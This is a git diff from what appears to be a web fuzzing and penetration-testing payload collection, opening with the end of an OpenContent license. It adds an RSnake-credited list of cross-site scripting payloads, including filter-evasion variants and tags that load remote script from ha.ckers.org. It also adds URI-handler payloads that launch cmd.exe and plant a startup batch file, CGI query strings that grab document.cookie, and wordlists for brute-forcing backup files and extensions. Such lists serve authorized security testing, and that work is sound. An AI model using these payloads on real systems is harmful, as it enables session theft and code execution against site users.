These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the OC, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the OC, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Exceptions are made to this requirement to release modified works free of charge under this license only in compliance with Fair Use law where applicable.
|
||||
|
||||
3. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to copy, distribute or modify the OC. These actions are prohibited by law if you do not accept this License. Therefore, by distributing or translating the OC, or by deriving works herefrom, you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or translating the OC.
|
||||
|
||||
NO WARRANTY
|
||||
|
||||
4. BECAUSE THE OPENCONTENT (OC) IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE OC, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE OC "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK OF USE OF THE OC IS WITH YOU. SHOULD THE OC PROVE FAULTY, INACCURATE, OR OTHERWISE UNACCEPTABLE YOU ASSUME THE COST OF ALL NECESSARY REPAIR OR CORRECTION.
|
||||
|
||||
5. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MIRROR AND/OR REDISTRIBUTE THE OC AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE OC, EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
|
||||
|
74
attack-payloads/xss/xss-rsnake.txt
Normal file
74
attack-payloads/xss/xss-rsnake.txt
Normal file
|
@ -0,0 +1,74 @@
|
|||
# credit to rsnake
|
||||
<SCRIPT>alert('XSS');</SCRIPT>
|
||||
'';!--"<XSS>=&{()}
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
SRC=
<IMG 6;avascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<SCRIPT>a=/XSS/
|
||||
\";alert('XSS');//
|
||||
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||
<BODY ONLOAD=alert('XSS')>
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<BGSOUND SRC="javascript:alert('XSS');">
|
||||
<BR SIZE="&{alert('XSS')}">
|
||||
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||
<IMG SRC="mocha:[code]">
|
||||
<IMG SRC="livescript:[code]">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
|
||||
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
||||
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||
getURL("javascript:alert('XSS')")
|
||||
a="get";
|
||||
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
|
||||
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
||||
<HTML><BODY>
|
||||
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||
<? echo('<SCR)';
|
||||
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
6
attack-payloads/xss/xss-uri.txt
Normal file
6
attack-payloads/xss/xss-uri.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
# Contains statements from jbrofuzz (13 April 2010)
|
||||
aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat"
|
||||
firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');"
|
||||
navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
|
||||
res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210
|
||||
|
8
discovery/filename-bruteforce/copy_of.txt
Normal file
8
discovery/filename-bruteforce/copy_of.txt
Normal file
|
@ -0,0 +1,8 @@
|
|||
Copy_(1)_of_
|
||||
Copy_(2)_of_
|
||||
Copy%20of%20
|
||||
Copy_of_
|
||||
Copy_
|
||||
Copy%20
|
||||
_
|
||||
%20
|
|
@ -0,0 +1,13 @@
|
|||
backup
|
||||
bck
|
||||
old
|
||||
save
|
||||
bak
|
||||
sav
|
||||
~
|
||||
copy
|
||||
old
|
||||
orig
|
||||
tmp
|
||||
txt
|
||||
back
|
|
@ -0,0 +1,863 @@
|
|||
$er
|
||||
123
|
||||
1pe
|
||||
1ph
|
||||
3dr
|
||||
3dt
|
||||
3me
|
||||
3pe
|
||||
4dl
|
||||
4dv
|
||||
8xk
|
||||
^^^
|
||||
a3l
|
||||
a3m
|
||||
a3w
|
||||
a4l
|
||||
a4m
|
||||
a4w
|
||||
a5l
|
||||
a5w
|
||||
a65
|
||||
aao
|
||||
ab
|
||||
ab1
|
||||
ab2
|
||||
ab3
|
||||
abcd
|
||||
abi
|
||||
abp
|
||||
aby
|
||||
aca
|
||||
acc
|
||||
accdb
|
||||
acf
|
||||
acg
|
||||
ade
|
||||
adp
|
||||
adt
|
||||
adx
|
||||
aft
|
||||
agd
|
||||
aifb
|
||||
alc
|
||||
ald
|
||||
ali
|
||||
amb
|
||||
amsorm
|
||||
an1
|
||||
anme
|
||||
apr
|
||||
arc
|
||||
arh
|
||||
ask
|
||||
asm
|
||||
ast
|
||||
at5
|
||||
att
|
||||
aw
|
||||
awg
|
||||
azw
|
||||
bafl
|
||||
bci
|
||||
bcm
|
||||
bdf
|
||||
bdic
|
||||
bfx
|
||||
bgl
|
||||
bgt
|
||||
bin
|
||||
bjo
|
||||
bk
|
||||
bkk
|
||||
blb
|
||||
bld
|
||||
blg
|
||||
bok
|
||||
box
|
||||
brd
|
||||
brw
|
||||
btf
|
||||
btif
|
||||
btm
|
||||
btr
|
||||
cap
|
||||
cat
|
||||
cbg
|
||||
cch
|
||||
ccr
|
||||
cct
|
||||
cdb
|
||||
cdd
|
||||
cdf
|
||||
cdp
|
||||
cdr
|
||||
cdx
|
||||
cel
|
||||
celtx
|
||||
chg
|
||||
chk
|
||||
chn
|
||||
ckd
|
||||
ckt
|
||||
cl2
|
||||
cl4
|
||||
clb
|
||||
clix
|
||||
clm
|
||||
clp
|
||||
cmbl
|
||||
cna
|
||||
contact
|
||||
cpi
|
||||
cpmz
|
||||
crd
|
||||
crtx
|
||||
csa
|
||||
csv
|
||||
ctf
|
||||
ctt
|
||||
cursorfx
|
||||
curxptheme
|
||||
cvd
|
||||
cvn
|
||||
cwk
|
||||
cws
|
||||
cwz
|
||||
cxt
|
||||
cyo
|
||||
cys
|
||||
daf
|
||||
dal
|
||||
dam
|
||||
das
|
||||
dat
|
||||
data
|
||||
db
|
||||
db2
|
||||
db3
|
||||
dbc
|
||||
dbd
|
||||
dbf
|
||||
dbx
|
||||
dcf
|
||||
dcl
|
||||
dcm
|
||||
dcmd
|
||||
ddc
|
||||
ddcx
|
||||
ddt
|
||||
dem
|
||||
des
|
||||
dex
|
||||
dfm
|
||||
dfproj
|
||||
dft
|
||||
dgb
|
||||
dif
|
||||
dii
|
||||
dlg
|
||||
dm2
|
||||
dmo
|
||||
dmsk
|
||||
dnc
|
||||
dockzip
|
||||
dp1
|
||||
dpn
|
||||
dpx
|
||||
drl
|
||||
dsb
|
||||
dsd
|
||||
dsk
|
||||
dsy
|
||||
dsz
|
||||
dt0
|
||||
dt1
|
||||
dt2
|
||||
dta
|
||||
dtr
|
||||
dvdproj
|
||||
dvo
|
||||
dwi
|
||||
e00
|
||||
eap
|
||||
ebuild
|
||||
ec0
|
||||
eco
|
||||
ecx
|
||||
edb
|
||||
edf
|
||||
eep
|
||||
efx
|
||||
egp
|
||||
emb
|
||||
emd
|
||||
emlxpart
|
||||
enc
|
||||
enw
|
||||
epp
|
||||
epub
|
||||
epw
|
||||
er1
|
||||
esp
|
||||
ess
|
||||
est
|
||||
esx
|
||||
et
|
||||
eta
|
||||
etd
|
||||
etl
|
||||
ev
|
||||
ev3
|
||||
evt
|
||||
evy
|
||||
exif
|
||||
exp
|
||||
exx
|
||||
fa
|
||||
fasta
|
||||
fbl
|
||||
fcd
|
||||
fcs
|
||||
fdb
|
||||
ffd
|
||||
ffwp
|
||||
fhc
|
||||
fid
|
||||
fil
|
||||
flame
|
||||
fll
|
||||
flo
|
||||
flp
|
||||
flt
|
||||
fm
|
||||
fm5
|
||||
fmp
|
||||
fo
|
||||
fob
|
||||
fol
|
||||
fop
|
||||
fox
|
||||
fp
|
||||
fp3
|
||||
fp4
|
||||
fp5
|
||||
fp7
|
||||
frl
|
||||
frm
|
||||
fro
|
||||
frx
|
||||
fsb
|
||||
fsc
|
||||
ftm
|
||||
ftw
|
||||
gan
|
||||
gbr
|
||||
gc
|
||||
gcx
|
||||
gdb
|
||||
ged
|
||||
gedcom
|
||||
gen
|
||||
ggb
|
||||
gml
|
||||
gms
|
||||
gno
|
||||
gnp
|
||||
gp3
|
||||
gpi
|
||||
gps
|
||||
gpx
|
||||
gra
|
||||
grade
|
||||
grf
|
||||
grib
|
||||
grk
|
||||
grr
|
||||
grv
|
||||
gs
|
||||
gst
|
||||
gtp
|
||||
gwk
|
||||
gxl
|
||||
hcc
|
||||
hce
|
||||
hci
|
||||
hcp
|
||||
hcr
|
||||
hcu
|
||||
hda
|
||||
hdb
|
||||
hdf
|
||||
hdi
|
||||
hdl
|
||||
hif
|
||||
hl
|
||||
hml
|
||||
hmt
|
||||
hs2
|
||||
hsk
|
||||
hst
|
||||
htg
|
||||
huh
|
||||
hyv
|
||||
i5z
|
||||
ib
|
||||
ics
|
||||
id2
|
||||
idx
|
||||
igc
|
||||
ihx
|
||||
ii
|
||||
iif
|
||||
img
|
||||
imt
|
||||
ink
|
||||
inp
|
||||
ins
|
||||
ip
|
||||
irock
|
||||
irr
|
||||
irx
|
||||
isf
|
||||
itdb
|
||||
itl
|
||||
itm
|
||||
itn
|
||||
itw
|
||||
itx
|
||||
ivt
|
||||
iw
|
||||
ixb
|
||||
jasper
|
||||
jdb
|
||||
jef
|
||||
jmp
|
||||
jnt
|
||||
job
|
||||
joboptions
|
||||
joined
|
||||
jph
|
||||
jrprint
|
||||
jrxml
|
||||
jude
|
||||
kap
|
||||
kdb
|
||||
kid
|
||||
kismac
|
||||
kmz
|
||||
kpf
|
||||
kpp
|
||||
kpr
|
||||
kpx
|
||||
kpz
|
||||
l
|
||||
l6t
|
||||
laccdb
|
||||
lbl
|
||||
lbx
|
||||
lcd
|
||||
lcf
|
||||
lcm
|
||||
ldif
|
||||
lex
|
||||
lgc
|
||||
lgf
|
||||
lgh
|
||||
lgi
|
||||
lgl
|
||||
lib
|
||||
lif
|
||||
livereg
|
||||
liveupdate
|
||||
lix
|
||||
llb
|
||||
lms
|
||||
lmx
|
||||
lnt
|
||||
loc
|
||||
lp7
|
||||
lrf
|
||||
lrs
|
||||
lrx
|
||||
lsf
|
||||
lsl
|
||||
lsp
|
||||
lsr
|
||||
lst
|
||||
lsu
|
||||
lvm
|
||||
lw4
|
||||
ly
|
||||
m
|
||||
mag
|
||||
mai
|
||||
map
|
||||
masseffectprofile
|
||||
mat
|
||||
mbb
|
||||
mbf
|
||||
mbg
|
||||
mbl
|
||||
mbp
|
||||
mbx
|
||||
mc1
|
||||
mc9
|
||||
mcd
|
||||
md
|
||||
mdb
|
||||
mdc
|
||||
mdf
|
||||
mdl
|
||||
mdm
|
||||
mdn
|
||||
mdt
|
||||
mdx
|
||||
mdz
|
||||
mem
|
||||
menc
|
||||
met
|
||||
mex
|
||||
mfo
|
||||
mfp
|
||||
mgc
|
||||
mls
|
||||
mm
|
||||
mmap
|
||||
mmc
|
||||
mmf
|
||||
mmp
|
||||
mnc
|
||||
mng
|
||||
mnk
|
||||
mno
|
||||
mny
|
||||
mobi
|
||||
moho
|
||||
mosaic
|
||||
mox
|
||||
mpd
|
||||
mpj
|
||||
mpp
|
||||
mpt
|
||||
mpx
|
||||
mpz
|
||||
mq4
|
||||
ms10
|
||||
mth
|
||||
mtw
|
||||
mud
|
||||
muf
|
||||
mw
|
||||
mwf
|
||||
mws
|
||||
mwx
|
||||
mxd
|
||||
myd
|
||||
myi
|
||||
nb
|
||||
nc
|
||||
ndf
|
||||
ndk
|
||||
ndx
|
||||
net
|
||||
neta
|
||||
nfo
|
||||
nitf
|
||||
nmind
|
||||
not
|
||||
notebook
|
||||
np
|
||||
npl
|
||||
npt
|
||||
nrl
|
||||
ns2
|
||||
ns3
|
||||
ns4
|
||||
nsf
|
||||
ntx
|
||||
numbers
|
||||
nvl
|
||||
nyf
|
||||
oab
|
||||
obj
|
||||
odb
|
||||
odf
|
||||
odp
|
||||
ods
|
||||
odx
|
||||
oeaccount
|
||||
ofc
|
||||
ofm
|
||||
oft
|
||||
ofx
|
||||
omcs
|
||||
omp
|
||||
ond
|
||||
one
|
||||
oo3
|
||||
opf
|
||||
opx
|
||||
or2
|
||||
or3
|
||||
or4
|
||||
or5
|
||||
or6
|
||||
org
|
||||
orx
|
||||
otf
|
||||
otl
|
||||
otln
|
||||
ots
|
||||
out
|
||||
ov2
|
||||
ova
|
||||
ovf
|
||||
p96
|
||||
p97
|
||||
pab
|
||||
paf
|
||||
pan
|
||||
pbd
|
||||
pc
|
||||
pcap
|
||||
pcb
|
||||
pcr
|
||||
pd4
|
||||
pd5
|
||||
pdas
|
||||
pdb
|
||||
pdd
|
||||
pdm
|
||||
pds
|
||||
pdx
|
||||
peb
|
||||
pec
|
||||
pep
|
||||
pex
|
||||
pfc
|
||||
pfl
|
||||
phb
|
||||
phm
|
||||
pi
|
||||
pis
|
||||
pjx
|
||||
pka
|
||||
pkb
|
||||
pkh
|
||||
pks
|
||||
pkt
|
||||
pln
|
||||
plw
|
||||
pmo
|
||||
pmr
|
||||
pnproj
|
||||
pnpt
|
||||
pns
|
||||
pnt
|
||||
pod
|
||||
poi
|
||||
pos
|
||||
postal
|
||||
pot
|
||||
potm
|
||||
potx
|
||||
pp2
|
||||
ppf
|
||||
pps
|
||||
ppsx
|
||||
ppt
|
||||
pptm
|
||||
pptx
|
||||
prc
|
||||
pre
|
||||
prf
|
||||
prj
|
||||
prm
|
||||
prs
|
||||
psa
|
||||
psf
|
||||
psm
|
||||
pst
|
||||
ptb
|
||||
ptf
|
||||
ptk
|
||||
ptm
|
||||
ptn
|
||||
ptt
|
||||
ptz
|
||||
pvl
|
||||
pwd
|
||||
pxj
|
||||
pxl
|
||||
q07
|
||||
q08
|
||||
q09
|
||||
q3d
|
||||
qbw
|
||||
qdat
|
||||
qdf
|
||||
qdfm
|
||||
qel
|
||||
qfx
|
||||
qif
|
||||
qpb
|
||||
qpf
|
||||
qph
|
||||
qpm
|
||||
qpw
|
||||
qrp
|
||||
qsd
|
||||
ral
|
||||
rbt
|
||||
rcd
|
||||
rcg
|
||||
rdb
|
||||
rdf
|
||||
rdx
|
||||
ref
|
||||
ret
|
||||
rf1
|
||||
rfa
|
||||
rfo
|
||||
rge
|
||||
rgn
|
||||
rgo
|
||||
rmuf
|
||||
rnq
|
||||
rod
|
||||
rog
|
||||
roi
|
||||
rou
|
||||
rpp
|
||||
rpt
|
||||
rrt
|
||||
rsc
|
||||
rsd
|
||||
rsw
|
||||
rte
|
||||
rvt
|
||||
rwg
|
||||
rzb
|
||||
s85
|
||||
saf
|
||||
sam07
|
||||
sar
|
||||
sav
|
||||
sbd
|
||||
sbf
|
||||
sbq
|
||||
sbt
|
||||
sca
|
||||
scf
|
||||
sch
|
||||
sdb
|
||||
sdc
|
||||
sdf
|
||||
sdp
|
||||
sdq
|
||||
sds
|
||||
sen
|
||||
seo
|
||||
seq
|
||||
ser
|
||||
sgml
|
||||
sgn
|
||||
shp
|
||||
shs
|
||||
shx
|
||||
skc
|
||||
skv
|
||||
skx
|
||||
sle
|
||||
slk
|
||||
slp
|
||||
snapfireshow
|
||||
sonic
|
||||
soundpack
|
||||
spo
|
||||
sps
|
||||
spub
|
||||
spv
|
||||
sq
|
||||
sqd
|
||||
sql
|
||||
sqlite
|
||||
sqr
|
||||
sta
|
||||
stc
|
||||
stf
|
||||
stk
|
||||
stl
|
||||
stm
|
||||
stp
|
||||
str
|
||||
stt
|
||||
stw
|
||||
styk
|
||||
stykz
|
||||
swk
|
||||
sxc
|
||||
sxi
|
||||
sy3
|
||||
t01
|
||||
t02
|
||||
t03
|
||||
t04
|
||||
t05
|
||||
t06
|
||||
t07
|
||||
t08
|
||||
t09
|
||||
t2
|
||||
t3001
|
||||
tax2008
|
||||
tax2009
|
||||
tb
|
||||
tbk
|
||||
tbl
|
||||
tcc
|
||||
tcx
|
||||
tda
|
||||
tdl
|
||||
tdm
|
||||
tdt
|
||||
te
|
||||
te3
|
||||
teacher
|
||||
tef
|
||||
tet
|
||||
tfa
|
||||
tfd
|
||||
tfrd
|
||||
tjp
|
||||
tk3
|
||||
tkfl
|
||||
tmw
|
||||
tol
|
||||
topc
|
||||
tpb
|
||||
tps
|
||||
tr3
|
||||
tra
|
||||
trd
|
||||
trk
|
||||
trs
|
||||
trx
|
||||
tst
|
||||
tsv
|
||||
ttk
|
||||
txa
|
||||
txd
|
||||
txf
|
||||
uccapilog
|
||||
ud
|
||||
udb
|
||||
udeb
|
||||
uds
|
||||
ulf
|
||||
ulz
|
||||
update
|
||||
upoi
|
||||
usr
|
||||
uvf
|
||||
uwl
|
||||
val
|
||||
vbpf1
|
||||
vcd
|
||||
vce
|
||||
vcf
|
||||
vcs
|
||||
vdb
|
||||
vdx
|
||||
vfs
|
||||
vi
|
||||
vip
|
||||
vle
|
||||
vlg
|
||||
vmt
|
||||
voi
|
||||
vok
|
||||
vrd
|
||||
vscontent
|
||||
vsx
|
||||
vtx
|
||||
vxml
|
||||
w02
|
||||
wab
|
||||
wb1
|
||||
wb2
|
||||
wb3
|
||||
wdb
|
||||
wdq
|
||||
wea
|
||||
wfd
|
||||
wfm
|
||||
wgp
|
||||
wgt
|
||||
windowslivecontact
|
||||
wjr
|
||||
wk1
|
||||
wk2
|
||||
wk3
|
||||
wk4
|
||||
wk5
|
||||
wke
|
||||
wki
|
||||
wks
|
||||
wku
|
||||
wlmp
|
||||
wmdb
|
||||
wor
|
||||
wpc
|
||||
wpf
|
||||
wpo
|
||||
wq1
|
||||
wq2
|
||||
wtb
|
||||
wtr
|
||||
xbk
|
||||
xdb
|
||||
xdp
|
||||
xds
|
||||
xef
|
||||
xem
|
||||
xfd
|
||||
xfo
|
||||
xft
|
||||
xl
|
||||
xlc
|
||||
xlgc
|
||||
xlr
|
||||
xls
|
||||
xlsb
|
||||
xlsm
|
||||
xlsx
|
||||
xlt
|
||||
xltm
|
||||
xltx
|
||||
xlw
|
||||
xmcd
|
||||
xml
|
||||
xmlper
|
||||
xmpz
|
||||
xpg
|
||||
xpj
|
||||
xpm
|
||||
xpt
|
||||
xrp
|
||||
xsl
|
||||
xslt
|
||||
xsn
|
||||
xtm
|
||||
xtp
|
||||
xxd
|
||||
yam
|
||||
zap
|
||||
zdb
|
||||
zdc
|
||||
zix
|
||||
zmc
|
||||
zpl
|
||||
{pb
|
||||
~hm
|
|
@ -0,0 +1,186 @@
|
|||
0
|
||||
000
|
||||
7z
|
||||
a00
|
||||
a01
|
||||
a02
|
||||
ace
|
||||
ain
|
||||
alz
|
||||
apz
|
||||
ar
|
||||
arc
|
||||
arh
|
||||
ari
|
||||
arj
|
||||
ark
|
||||
axx
|
||||
b64
|
||||
ba
|
||||
bh
|
||||
boo
|
||||
bz
|
||||
bz2
|
||||
bzip
|
||||
bzip2
|
||||
c00
|
||||
c01
|
||||
c02
|
||||
car
|
||||
cb7
|
||||
cbr
|
||||
cbt
|
||||
cbz
|
||||
cp9
|
||||
cpgz
|
||||
cpt
|
||||
dar
|
||||
dd
|
||||
deb
|
||||
dgc
|
||||
dist
|
||||
ecs
|
||||
efw
|
||||
epi
|
||||
f
|
||||
fdp
|
||||
gca
|
||||
gz
|
||||
gzi
|
||||
gzip
|
||||
ha
|
||||
hbc
|
||||
hbc2
|
||||
hbe
|
||||
hki
|
||||
hki1
|
||||
hki2
|
||||
hki3
|
||||
hpk
|
||||
hyp
|
||||
ice
|
||||
ipg
|
||||
ipk
|
||||
ish
|
||||
j
|
||||
jar.pack
|
||||
jgz
|
||||
jic
|
||||
kgb
|
||||
lbr
|
||||
lemon
|
||||
lha
|
||||
lnx
|
||||
lqr
|
||||
lz
|
||||
lzh
|
||||
lzm
|
||||
lzma
|
||||
lzo
|
||||
lzx
|
||||
md
|
||||
mint
|
||||
mou
|
||||
mpkg
|
||||
mzp
|
||||
oar
|
||||
p7m
|
||||
packgz
|
||||
package
|
||||
pae
|
||||
pak
|
||||
paq6
|
||||
paq7
|
||||
paq8
|
||||
par
|
||||
par2
|
||||
pbi
|
||||
pcv
|
||||
pea
|
||||
pet
|
||||
pf
|
||||
pim
|
||||
pit
|
||||
piz
|
||||
pkg
|
||||
pup
|
||||
puz
|
||||
pwa
|
||||
qda
|
||||
r0
|
||||
r00
|
||||
r01
|
||||
r02
|
||||
r03
|
||||
r1
|
||||
r2
|
||||
r30
|
||||
rar
|
||||
rev
|
||||
rk
|
||||
rnc
|
||||
rp9
|
||||
rpm
|
||||
rte
|
||||
rz
|
||||
rzs
|
||||
s00
|
||||
s01
|
||||
s02
|
||||
s7z
|
||||
sar
|
||||
sdc
|
||||
sdn
|
||||
sea
|
||||
sen
|
||||
sfs
|
||||
sfx
|
||||
sh
|
||||
shar
|
||||
shk
|
||||
shr
|
||||
sit
|
||||
sitx
|
||||
spt
|
||||
sqx
|
||||
sqz
|
||||
tar
|
||||
targz
|
||||
tarxz
|
||||
taz
|
||||
tbz
|
||||
tbz2
|
||||
tg
|
||||
tgz
|
||||
tlz
|
||||
tlzma
|
||||
txz
|
||||
tz
|
||||
uc2
|
||||
uha
|
||||
vem
|
||||
vsi
|
||||
wad
|
||||
war
|
||||
wot
|
||||
xef
|
||||
xez
|
||||
xmcdz
|
||||
xpi
|
||||
xx
|
||||
xz
|
||||
y
|
||||
yz
|
||||
z
|
||||
z01
|
||||
z02
|
||||
z03
|
||||
z04
|
||||
zap
|
||||
zfsendtotarget
|
||||
zip
|
||||
zipx
|
||||
zix
|
||||
zoo
|
||||
zpi
|
||||
zz
|
|
@ -0,0 +1,30 @@
|
|||
asp
|
||||
aspx
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
txt
|
||||
shtm
|
||||
shtml
|
||||
phtm
|
||||
phtml
|
||||
jhtml
|
||||
pl
|
||||
jsp
|
||||
cfm
|
||||
cfml
|
||||
py
|
||||
rb
|
||||
cfg
|
||||
zip
|
||||
pdf
|
||||
gz
|
||||
tar
|
||||
tar.gz
|
||||
tgz
|
||||
doc
|
||||
docx
|
||||
xls
|
||||
xlsx
|
||||
conf
|
|
@ -0,0 +1,93 @@
|
|||
7z
|
||||
asmx
|
||||
asp
|
||||
aspx
|
||||
bak
|
||||
bat
|
||||
bin
|
||||
bz2
|
||||
c
|
||||
cc
|
||||
cfg
|
||||
cfm
|
||||
cgi
|
||||
class
|
||||
cnf
|
||||
conf
|
||||
config
|
||||
cpp
|
||||
cs
|
||||
csv
|
||||
dat
|
||||
db
|
||||
dll
|
||||
do
|
||||
doc
|
||||
dump
|
||||
ep
|
||||
err
|
||||
error
|
||||
exe
|
||||
gif
|
||||
gz
|
||||
htm
|
||||
html
|
||||
inc
|
||||
ini
|
||||
java
|
||||
jhtml
|
||||
jpg
|
||||
js
|
||||
jsf
|
||||
jsp
|
||||
key
|
||||
lib
|
||||
log
|
||||
lst
|
||||
manifest
|
||||
mdb
|
||||
meta
|
||||
msg
|
||||
nsf
|
||||
o
|
||||
old
|
||||
ora
|
||||
orig
|
||||
out
|
||||
part
|
||||
pdf
|
||||
php
|
||||
php3
|
||||
phtml
|
||||
pl
|
||||
pm
|
||||
png
|
||||
ppt
|
||||
properties
|
||||
py
|
||||
rar
|
||||
rss
|
||||
rtf
|
||||
save
|
||||
sh
|
||||
shtml
|
||||
so
|
||||
sql
|
||||
stackdump
|
||||
swf
|
||||
tar
|
||||
tar.bz2
|
||||
tar.gz
|
||||
temp
|
||||
test
|
||||
tgz
|
||||
tmp
|
||||
trace
|
||||
txt
|
||||
vb
|
||||
vbs
|
||||
ws
|
||||
xls
|
||||
xml
|
||||
xsl
|
||||
zip
|
File diff suppressed because it is too large
Load diff
7
discovery/generic/cgi-HTTP-POST-reqd.txt
Normal file
7
discovery/generic/cgi-HTTP-POST-reqd.txt
Normal file
|
@ -0,0 +1,7 @@
|
|||
post-query
|
||||
Config1.htm
|
||||
My_eGallery/public/displayCategory.php
|
||||
servlet/custMsg?guestName=<script>alert(document.cookie)(\
|
||||
servlet/CookieExample?cookiename=<script>alert(document.cookie)(\
|
||||
lastlines.cgi?process
|
||||
